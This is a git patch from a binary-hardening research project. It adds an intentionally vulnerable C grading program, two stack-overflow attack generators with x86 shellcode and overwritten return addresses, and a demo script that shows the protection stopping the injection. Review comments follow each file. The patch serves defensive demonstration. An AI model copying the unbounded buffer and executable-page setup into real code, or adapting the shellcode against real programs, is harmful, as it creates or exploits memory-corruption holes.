From 5967f3a19dea561edb1f3cc9c25a081f8c8b6e83 Mon Sep 17 00:00:00 2001
From: mc2zk <mc2zk@git.zephyr-software.com>
Date: Tue, 11 Jan 2011 22:59:01 +0000
Subject: [PATCH] Adding demos directory to peasoup_examples. badA.txt and
 badB.txt are example bad inputs generated from running the attack generators:
 attack-gradeA.no_strata and attack-gradeB.no_strata

---
 .gitattributes                                |  10 ++
 demos/demo.jan_21_2011/Makefile               |  15 +++
 demos/demo.jan_21_2011/dumbledore.c           |  47 ++++++++
 .../dumbledore.exploits/Makefile              |  21 ++++
 .../attack-gradeA.no_strata.c                 |  58 ++++++++++
 .../attack-gradeB.no_strata.c                 |  47 ++++++++
 .../dumbledore.exploits/badA.txt              | Bin 0 -> 131 bytes
 .../dumbledore.exploits/badB.txt              | Bin 0 -> 135 bytes
 .../dumbledore.good_inputs/good.txt           |   1 +
 demos/demo.jan_21_2011/dumbledore_cmd.c       |  44 ++++++++
 demos/demo.jan_21_2011/ps_demo.sh             | 104 ++++++++++++++++++
 examples/dumbledore.c                         |   2 +
 examples/dumbledore_cmd.c                     |   2 -
 tools/ps_run.sh                               |   2 +-
 14 files changed, 350 insertions(+), 3 deletions(-)
 create mode 100644 demos/demo.jan_21_2011/Makefile
 create mode 100644 demos/demo.jan_21_2011/dumbledore.c
 create mode 100644 demos/demo.jan_21_2011/dumbledore.exploits/Makefile
 create mode 100755 demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeA.no_strata.c
 create mode 100644 demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeB.no_strata.c
 create mode 100644 demos/demo.jan_21_2011/dumbledore.exploits/badA.txt
 create mode 100644 demos/demo.jan_21_2011/dumbledore.exploits/badB.txt
 create mode 100644 demos/demo.jan_21_2011/dumbledore.good_inputs/good.txt
 create mode 100644 demos/demo.jan_21_2011/dumbledore_cmd.c
 create mode 100755 demos/demo.jan_21_2011/ps_demo.sh

diff --git a/.gitattributes b/.gitattributes
index 7f26ed590..240f443eb 100644
--- a/.gitattributes
+++ b/.gitattributes
@@ -2,6 +2,16 @@
 /Makefile -text
 chopzero_src/Makefile -text
 chopzero_src/chopzero.c -text
+demos/demo.jan_21_2011/Makefile -text
+demos/demo.jan_21_2011/dumbledore.c -text
+demos/demo.jan_21_2011/dumbledore.exploits/Makefile -text
+demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeA.no_strata.c -text
+demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeB.no_strata.c -text
+demos/demo.jan_21_2011/dumbledore.exploits/badA.txt -text
+demos/demo.jan_21_2011/dumbledore.exploits/badB.txt -text
+demos/demo.jan_21_2011/dumbledore.good_inputs/good.txt -text
+demos/demo.jan_21_2011/dumbledore_cmd.c -text
+demos/demo.jan_21_2011/ps_demo.sh -text
 examples/Makefile -text
 examples/block_copy.c -text
 examples/cmd_args_005.c -text
diff --git a/demos/demo.jan_21_2011/Makefile b/demos/demo.jan_21_2011/Makefile
new file mode 100644
index 000000000..dc4d6502c
--- /dev/null
+++ b/demos/demo.jan_21_2011/Makefile
@@ -0,0 +1,15 @@
+TOOLBASE=${PEASOUP_HOME}/tools
+
+all: dumbledore.original dumbledore_cmd.original
+
+dumbledore.original: dumbledore.o
+	${TOOLBASE}/ps_link.sh dumbledore.o -o dumbledore.original
+
+dumbledore_cmd.original: dumbledore_cmd.o
+	${TOOLBASE}/ps_link.sh dumbledore_cmd.o -o dumbledore_cmd.original
+
+.c.o:
+	${TOOLBASE}/ps_comp.sh  $<
+
+clean:
+	rm *.o dumbledore.original dumbledore_cmd.original dumbledore.protected dumbledore_cmd.protected
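Review bot: The `clean` rule runs `rm` without `-f`, so it aborts with an error whenever one of the listed files is absent, which is the normal case for `dumbledore.protected` and `dumbledore_cmd.protected` since nothing in this Makefile produces them; `rm -f *.o dumbledore.original dumbledore_cmd.original dumbledore.protected dumbledore_cmd.protected` makes it idempotent. `TOOLBASE=${PEASOUP_HOME}/tools` silently degrades to `/tools` when the variable is unset, while ps_demo.sh in the same directory refuses to run in that case; a guard such as `ifndef PEASOUP_HOME` / `$(error PEASOUP_HOME must point at the peasoup_examples directory)` / `endif` gives the build the same diagnostic.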
diff --git a/demos/demo.jan_21_2011/dumbledore.c b/demos/demo.jan_21_2011/dumbledore.c
new file mode 100644
index 000000000..02e2f05c1
--- /dev/null
+++ b/demos/demo.jan_21_2011/dumbledore.c
@@ -0,0 +1,47 @@
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+enum {BUFSIZE = 98};
+
+char grade = 'D';
+char Name[BUFSIZE];
+FILE *f;
+
+void readString(char *s) {
+   char buf[BUFSIZE];
+   int i = 0; 
+   int c;
+
+   for (;;) 
+   {
+      c = getchar();
+      if ((c == EOF) || (c == '\n')) 
+         break;
+      buf[i] = c;
+      i++;
+   }
+   buf[i] = '\0';
+
+   for (i = 0; i < BUFSIZE; i++) 
+      s[i] = buf[i];
+}
+
+
+int main(void) 
+{
+   mprotect((void*)((unsigned int)Name & 0xfffff000), 1,
+            PROT_READ | PROT_WRITE | PROT_EXEC);
+   readString(Name);
+
+   if (strcmp(Name, "Wizard in Training") == 0) 
+      grade = 'B';
+
+   printf("Thank you, %s.\n", Name);
+   printf("I recommend that you get a grade of %c on this assignment.\n", grade);
+
+   exit(0);
+}
+
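Review bot: The `mprotect` call in `main` ignores its return value, so when the kernel refuses to make the page holding `Name` executable the program carries on unchanged and the demonstration silently stops meaning what it claims; check it, e.g. `if (mprotect(..., PROT_READ | PROT_WRITE | PROT_EXEC) != 0) { perror("mprotect"); exit(1); }`. The cast `(unsigned int)Name` also truncates the pointer on any 64-bit build and `0xfffff000` hard-codes a 4 KiB page; `(void *)((uintptr_t)Name & ~(uintptr_t)(sysconf(_SC_PAGESIZE) - 1))` avoids both (it needs `<stdint.h>` and `<unistd.h>`), and the same two lines are added to examples/dumbledore.c in this commit, to which the same applies. This file is byte-identical to examples/dumbledore.c (both headers show blob 02e2f05c1), so the two copies will drift unless one refers to the other; a one-line header comment stating that `readString` is deliberately unbounded and that the writable-and-executable page exists only for the demonstration would also keep a later reader from "fixing" either copy.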
diff --git a/demos/demo.jan_21_2011/dumbledore.exploits/Makefile b/demos/demo.jan_21_2011/dumbledore.exploits/Makefile
new file mode 100644
index 000000000..e0974acf9
--- /dev/null
+++ b/demos/demo.jan_21_2011/dumbledore.exploits/Makefile
@@ -0,0 +1,21 @@
+# This file contains rules to build attack generators for the dumbledore example
+#	which uses file input.
+# 	attack-gradeXXX.no_strata is the attack generator for a non-stratafied 
+#		application
+#	The attack generator for stratafied application may need 
+#		to be slightly different
+PS_TOOLBASE=../../tools
+
+all: attack-gradeA attack-gradeB
+
+attack-gradeA.no_strata: attack-gradeA.no_strata.o
+	${PS_TOOLBASE}/ps_link.sh attack-gradeA.no_strata.o -o gradeA.no_strata
+
+attack-gradeB.no_strata: attack-gradeB.no_strata.o
+	${PS_TOOLBASE}/ps_link.sh attack-gradeB.no_strata.o -o gradeB.no_strata
+
+.c.o:
+	${PS_TOOLBASE}/ps_comp.sh $<
+
+clean:
+	rm gradeA.no_strata gradeB.no_strata *.o
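Review bot: `all: attack-gradeA attack-gradeB` names two targets that no rule in this file produces, so `make` in this directory stops with "No rule to make target" instead of building the generators; the rules defined are `attack-gradeA.no_strata` and `attack-gradeB.no_strata`, and `all` should list those. Each link rule also writes `-o gradeA.no_strata` / `-o gradeB.no_strata` rather than the file its target is named after, so the target is never up to date and is relinked on every run; `-o $@` fixes that, with `clean` adjusted to match. `PS_TOOLBASE=../../tools` resolves to `demos/tools`, which this diff does not show anywhere while the sibling demos Makefile uses `${PEASOUP_HOME}/tools`; presumably the relative path was carried over from a directory one level shallower.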
diff --git a/demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeA.no_strata.c b/demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeA.no_strata.c
new file mode 100755
index 000000000..097546fa8
--- /dev/null
+++ b/demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeA.no_strata.c
@@ -0,0 +1,58 @@
+#include <stdio.h>
+#include <string.h>
+                                      /* stack location address */
+char attackString[] =
+    "Ja"		   /* 0xbfffefa6 */ /* Name: 0x80c80c0 */
+    "ck D"                 /* 0xbfffefa8 */ /* Name: 0x80c80c2 */
+    "avid"                 /* 0xbfffefac */ /* Name: 0x80c80c6 */
+    "son\x00"              /* 0xbfffefb0 */ /* Name: 0x80c80ca */
+    "\xc6\x05\x08\x60"     /* 0xbfffefb4 */ /* Name: 0x80c80ce */ /* movb $0x41,0x080c6008 addr of grade */
+    "\x0c\x08\x41\x90"     /* 0xbfffefb8 */ /* nop is \x90 */ 
+    "\x68\xf7\x82\x04"     /* 0xbfffefbc */ /* op 68 is push ret addr 0x080482f7 */
+    "\x08\x90\xc3\x3e"     /* 0xbfffefc0 */	/* nop is \x90; c3 is ret inst */ 
+    "\x20\x20\x20\x20"     /* 0xbfffefc4 */
+    "\x20\x20\x20\x20"     /* 0xbfffefc8 */
+    "\x20\x20\x20\x20"     /* 0xbfffefcc */
+    "\x20\x20\x20\x20"     /* 0xbfffefd0 */
+    "\x20\x20\x20\x20"     /* 0xbfffefd4 */
+    "\x20\x20\x20\x20"     /* 0xbfffefd8 */
+    "\x20\x20\x20\x20"     /* 0xbfffefdc */
+    "\x20\x20\x20\x20"     /* 0xbfffefe0 */
+    "\x20\x20\x20\x20"     /* 0xbfffefe4 */
+    "\x20\x20\x20\x20"     /* 0xbfffefe8 */
+    "\x20\x20\x20\x20"     /* 0xbfffefec */
+    "\x20\x20\x20\x20"     /* 0xbfffeff0 */
+    "\x20\x20\x20\x20"     /* 0xbfffeff4 */
+    "\x20\x20\x20\x20"     /* 0xbfffeff8 */
+    "\x20\x20\x20\x20"     /* 0xbfffeffc */
+    "\x20\x20\x20\x20"     /* 0xbffff000 */
+    "\x20\x20\x20\x20"     /* 0xbffff004 */
+    "\x62\x00\x00\x00"     /* 0xbffff008 */	/* i here */
+    "\x20\x20\x20\x20"     /* 0xbffff00c */ 	/* c here */
+    "\x20\x20\x20\x20"     /* 0xbffff010 */
+    "\x20\x20\x20\x20"     /* 0xbffff014 */
+    "\x38\xf0\xff\xbf"     /* 0xbffff018 */	/* ebp  aka frame ptr */
+    "\xce\x80\x0c\x08"     /* 0xbffff01c */	/* return address should b
+							the addr of Name 
+							where injection code is
+							0x80c80ce */
+    "\xc0\x80\x0c\x08"     /* 0xbffff020 */ 	/* address of Name */ 
+    "\x0a\x0a\x0a\x0a" ;    /* 0xbffff024 */
+/* The key to the attack is to change the return address (located on the
+   stack at address 0x22cc7c as indicated in the above picture to
+   point to the code location in main where the grade is set to a "B".
+   However, it is also important for the buffer overrun to preserve the
+   frame pointer and the address of grade on the stack (grade is passed and s
+   points to it
+*/
+
+
+int main() {
+   int i;
+   char *p = attackString;
+   for (i = 0; i < sizeof(attackString); i++) {
+      putchar(*p);
+      p++;
+   }
+   return 1;
+}
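Review bot: The block comment after `attackString` describes a different file: it refers to "address 0x22cc7c as indicated in the above picture" although there is no picture and none of the inline annotations use that address, and it says the goal is the location in main "where the grade is set to a 'B'" while this generator's own annotation on the `movb` line says it writes `$0x41`; either delete the paragraph or reword it to match this file, since a stale explanation is worse than none in a teaching demo. `main` returns 1, so a successful run reports failure to the calling shell and to any script that checks `$?`; `return 0;` is the conventional value. `<string.h>` is included but unused, and the loop compares the signed `int i` with `sizeof(attackString)`, which -Wall flags; `size_t i` avoids the warning. The last three points apply unchanged to attack-gradeB.no_strata.c in this commit.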
diff --git a/demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeB.no_strata.c b/demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeB.no_strata.c
new file mode 100644
index 000000000..799646630
--- /dev/null
+++ b/demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeB.no_strata.c
@@ -0,0 +1,47 @@
+#include <stdio.h>
+#include <string.h>
+                                      /* stack location address */
+char attackString[] = "Ja"                   /* 0x0bfffefa6 */
+                      "ck D"                 /* 0x0bfffefa8 */
+                      "avid"                 /* 0x0bfffefac */
+                      "son\x00"              /* 0x0bfffefb0 */
+                      "\xc6\x05\x20\x20"     /* 0x0bfffefb4 */ 
+		      "\x40\x20\x41\x90"     /* 0x0bfffefb8 */
+                      "\x68\x33\x11\x40"     /* 0x0bfffefbc */
+                      "\x00\x90\xc3\x3e"     /* 0x0bfffefc0 */
+                      "\x20\x20\x20\x20"     /* 0x0bfffefc4 */
+                      "\x20\x20\x20\x20"     /* 0x0bfffefc8 */
+                      "\x20\x20\x20\x20"     /* 0x0bfffefcc */
+                      "\x20\x20\x20\x20"     /* 0x0bfffefd0 */
+                      "\x20\x20\x20\x20"     /* 0x0bfffefd4 */
+                      "\x20\x20\x20\x20"     /* 0x0bfffefd8 */
+                      "\x20\x20\x20\x20"     /* 0x0bfffefdc */
+                      "\x20\x20\x20\x20"     /* 0x0bfffefe0 */
+                      "\x20\x20\x20\x20"     /* 0x0bfffefe4 */
+                      "\x20\x20\x20\x20"     /* 0x0bfffefe8 */
+                      "\x20\x20\x20\x20"     /* 0x0bfffefec */
+                      "\x20\x20\x20\x20"     /* 0x0bfffeff0 */
+                      "\x20\x20\x20\x20"     /* 0x0bfffeff4 */
+                      "\x20\x20\x20\x20"     /* 0x0bfffeff8 */
+                      "\x20\x20\x20\x20"     /* 0x0bfffeffc */
+                      "\x20\x20\x20\x20"     /* 0x0bffff000 */
+                      "\x20\x20\x20\x20"     /* 0x0bffff004 */
+                      "\x62\x00\x00\x00"     /* 0x0bffff008 */  /* i here */
+                      "\x20\x20\x20\x20"     /* 0x0bffff00c */  /* c here */
+                      "\x20\x20\x20\x20"     /* 0x0bffff010 */
+                      "\x20\x20\x20\x20"     /* 0x0bffff014 */
+                      "\x38\xf0\xff\xbf"     /* 0x0bffff018 */  /* ebp */
+                      "\xfd\x82\x04\x08"     /* 0x0bffff01c */ /*  return addr */
+                      "\xc0\x80\x0c\x08"     /* 0x0bffff020 */ /* addr Name */ 
+                      "\x0a\x0a\x0a\x0a"     /* 0x0bffff024 */
+                      "\x0a\x0a\x0a\x0a";    /* 0x0bffff028 */
+int main() {
+   int i;
+   char *p = attackString;
+   for (i = 0; i < sizeof(attackString); i++) {
+      putchar(*p);
+      p++;
+   }
+   return 1;
+}
+
diff --git a/demos/demo.jan_21_2011/dumbledore.exploits/badA.txt b/demos/demo.jan_21_2011/dumbledore.exploits/badA.txt
new file mode 100644
index 0000000000000000000000000000000000000000..2103f665448a25c644bb81f462b2bcc0a490453c
GIT binary patch
literal 131
zcmeZDOwLwtNi54uDbCMhIL6A6z{BA<A>(@!3&(`Rb_!GgNem1O$i`TF_`m;L0}sam
JAm#!B1^{m(8jb(}

literal 0
HcmV?d00001

diff --git a/demos/demo.jan_21_2011/dumbledore.exploits/badB.txt b/demos/demo.jan_21_2011/dumbledore.exploits/badB.txt
new file mode 100644
index 0000000000000000000000000000000000000000..c3520ece5ad8b805d5f40c78ee09bfd1c0f002e1
GIT binary patch
literal 135
zcmeZDOwLwtNi54uDbCMhIL4}=;Gp0*A;VbEfnma7I|V9$BnAcsWMeEo{NMk#iG|}p
L0}lrm6fgh)e482q

literal 0
HcmV?d00001

diff --git a/demos/demo.jan_21_2011/dumbledore.good_inputs/good.txt b/demos/demo.jan_21_2011/dumbledore.good_inputs/good.txt
new file mode 100644
index 000000000..eeae9c63e
--- /dev/null
+++ b/demos/demo.jan_21_2011/dumbledore.good_inputs/good.txt
@@ -0,0 +1 @@
+Jack Davidson
diff --git a/demos/demo.jan_21_2011/dumbledore_cmd.c b/demos/demo.jan_21_2011/dumbledore_cmd.c
new file mode 100644
index 000000000..7aff3c7e9
--- /dev/null
+++ b/demos/demo.jan_21_2011/dumbledore_cmd.c
@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+enum {BUFSIZE = 24};
+
+char grade = 'D';
+char Name[BUFSIZE];
+
+void readString(char *in, char *s) {
+   char buf[BUFSIZE];
+   int i = 0; 
+   int c;
+
+   for (;;) 
+   {
+      c = in[i];
+      if ((c == '\0') || (c == '\n')) 
+         break;
+
+      buf[i] = c;
+      i++;
+   }
+   buf[i] = '\0';
+
+   for (i = 0; i < BUFSIZE; i++) 
+      s[i] = buf[i];
+}
+
+
+int main(int argc, char * argv[])
+{
+   if (argc == 2)
+      readString(argv[1], Name);
+
+   if (strcmp(Name, "Wizard in Training") == 0) 
+      grade = 'B';
+
+   printf("Thank you, %s.\n", Name);
+   printf("I recommend that you get a grade of %c on this assignment.\n", grade);
+
+   return 0;
+}
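Review bot: `readString` copies `in` into the fixed `buf[BUFSIZE]` with no bound and `main` passes it `argv[1]` directly, so this is the intentionally overflowable demo target, yet nothing in the file says so; a header comment such as `/* Deliberately vulnerable demo program: readString has no bounds check on its input. */` would stop the next reader from either "fixing" it or reusing it elsewhere. The blob is byte-identical to examples/dumbledore_cmd.c (both headers show index 7aff3c7e9), so the two copies will drift unless one references the other. `<sys/mman.h>` and `<stdlib.h>` are included but nothing in this file uses them.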
diff --git a/demos/demo.jan_21_2011/ps_demo.sh b/demos/demo.jan_21_2011/ps_demo.sh
new file mode 100755
index 000000000..8ae7fddd3
--- /dev/null
+++ b/demos/demo.jan_21_2011/ps_demo.sh
@@ -0,0 +1,104 @@
+#!/bin/sh
+
+if [ "${PEASOUP_HOME}x" = "x" ]; then
+	echo "environment variable: PEASOUP_HOME is empty."
+	echo "PEASOUP_HOME must be defined to point at a valid peasoup_examples directory"
+	exit 1
+fi
+
+TOOLBASE=${PEASOUP_HOME}/tools
+
+# A pause function
+Pause()
+{
+	key=""
+	echo -n "\nPress any key to continue...\n"
+	echo
+	stty -icanon
+	key=`dd count=1 2>/dev/null`
+	stty icanon
+}
+
+# N.B. - Assumes that dumbledore.original has already been built.
+# clear the screen
+clear
+# 1) Run dumbledore_cmd.original with good input
+echo "Running dumbledore.original with a good input\n"
+good_input=`cat dumbledore.good_inputs/good.txt`
+echo "Input: ${good_input}\n"
+
+echo "./dumbledore.original < dumbledore.good_inputs/good.txt\n"
+
+Pause
+
+./dumbledore.original  < dumbledore.good_inputs/good.txt
+
+Pause
+
+# clear the screen
+clear
+
+# 2) Run dumbledore_cmd.original with a bad input that PEASOUP can catch
+#	input is too long and overwrites return address and base pointer
+
+echo "Running dumbledore.original with a bad input which performs code injection. \n"
+
+bad_input=`cat dumbledore.exploits/badA.txt`
+echo "Input: ${bad_input}\n"
+echo "./dumbledore.original < dumbledore.exploits/badA.txt\n"
+
+Pause
+
+./dumbledore.original < dumbledore.exploits/badA.txt
+
+Pause
+
+# 3) Run ps_analyze.sh dumbledore_cmd.original dumbledore_cmd.protected
+#	Point out IDA pass
+#	Point out GraCE run
+
+# clear the screen
+clear
+echo "Running PEASOUP analysis phase...\n"
+echo "${TOOLBASE}/ps_analyze.sh dumbledore.original dumbledore.protected\n"
+
+Pause
+
+${TOOLBASE}/ps_analyze.sh dumbledore.original dumbledore.protected
+
+Pause
+
+# clear the screen
+clear
+
+# 4) Run dumbledore.protected on good input
+echo "Running dumbledore.protected on good input\n"
+echo "Input: ${good_input}\n"
+echo "./dumbledore.protected < dumbledore.good_inputs/good.txt\n"
+
+Pause
+
+./dumbledore.protected < dumbledore.good_inputs/good.txt
+
+Pause
+
+# clear the screen
+clear
+# 5) Run dumbledore.protected on bad input A, show defeat of exploit
+echo "Running dumbledore.protected on bad input which performs code injection\n"
+
+input=`cat dumbledore.exploits/badA.txt`
+echo "Input: ${bad_input}\n"
+echo "./dumbledore.protected < dumbledore.exploits/badA.txt\n"
+
+Pause
+
+./dumbledore.protected < dumbledore.exploits/badA.txt
+
+Pause
+
+echo "GDB step through...."
+# 6) Demonstrate add_pc_confinement.sh
+# 7) Run dumbledore.protected in gdb with bad input with bp set at confined_targ_fetch(), fetching a good instruction, and show it when catching the bad instruction.
+# 8) Run dumbledore.protected on bad input #2, show that we did not defeat the exploit
+
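Review bot: `Pause` puts the terminal into `stty -icanon` and only restores it if `dd` returns, so interrupting the script at any prompt leaves the user's shell in non-canonical mode; a `trap 'stty icanon 2>/dev/null' EXIT INT TERM` next to the `TOOLBASE=` line restores it on every exit path. In step 5 the line `input=\`cat dumbledore.exploits/badA.txt\`` assigns `input` but the next line prints `${bad_input}`, which only works because step 2 set that variable earlier; use `bad_input=` in both places or drop the second `cat`. The script is `#!/bin/sh` yet relies on `echo -n` and on `\n` escapes inside `echo` arguments, whose handling differs between dash and bash; `printf '%s\n' "..."` behaves the same everywhere. The result of `${TOOLBASE}/ps_analyze.sh` is not checked, so a failed analysis goes on to run a `dumbledore.protected` that was never produced; appending `|| exit 1` stops there. The comments for steps 1 to 3 say `dumbledore_cmd.original` while the commands run `dumbledore.original`.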
diff --git a/examples/dumbledore.c b/examples/dumbledore.c
index 39951a5b7..02e2f05c1 100644
--- a/examples/dumbledore.c
+++ b/examples/dumbledore.c
@@ -32,6 +32,8 @@ void readString(char *s) {
 
 int main(void) 
 {
+   mprotect((void*)((unsigned int)Name & 0xfffff000), 1,
+            PROT_READ | PROT_WRITE | PROT_EXEC);
    readString(Name);
 
    if (strcmp(Name, "Wizard in Training") == 0) 
diff --git a/examples/dumbledore_cmd.c b/examples/dumbledore_cmd.c
index 8b9ddd611..7aff3c7e9 100644
--- a/examples/dumbledore_cmd.c
+++ b/examples/dumbledore_cmd.c
@@ -42,5 +42,3 @@ int main(int argc, char * argv[])
 
    return 0;
 }
-
-
diff --git a/tools/ps_run.sh b/tools/ps_run.sh
index 2239153da..d10b42bbb 100755
--- a/tools/ps_run.sh
+++ b/tools/ps_run.sh
@@ -3,6 +3,6 @@
 datapath=$1
 shift;
 
-STRATA_ANNOT_FILE=$datapath/a.ncexe.annot STRATA_PC_CONFINE=0 $datapath/a.stratafied $*
+STRATA_ANNOT_FILE=$datapath/a.ncexe.annot STRATA_PC_CONFINE=1 $datapath/a.stratafied $*
 
 
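Review bot: The rewritten line still forwards the program's arguments as unquoted `$*`, which re-splits any argument containing whitespace or glob characters before `a.stratafied` sees it; `STRATA_ANNOT_FILE=$datapath/a.ncexe.annot STRATA_PC_CONFINE=1 $datapath/a.stratafied "$@"` preserves the caller's argument boundaries, and `"$datapath"` deserves the same quoting. Flipping `STRATA_PC_CONFINE` from 0 to 1 changes the runtime behaviour of every protected binary launched through this script, but the commit message only describes the new demos directory; that change warrants its own sentence there.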
-- 
GitLab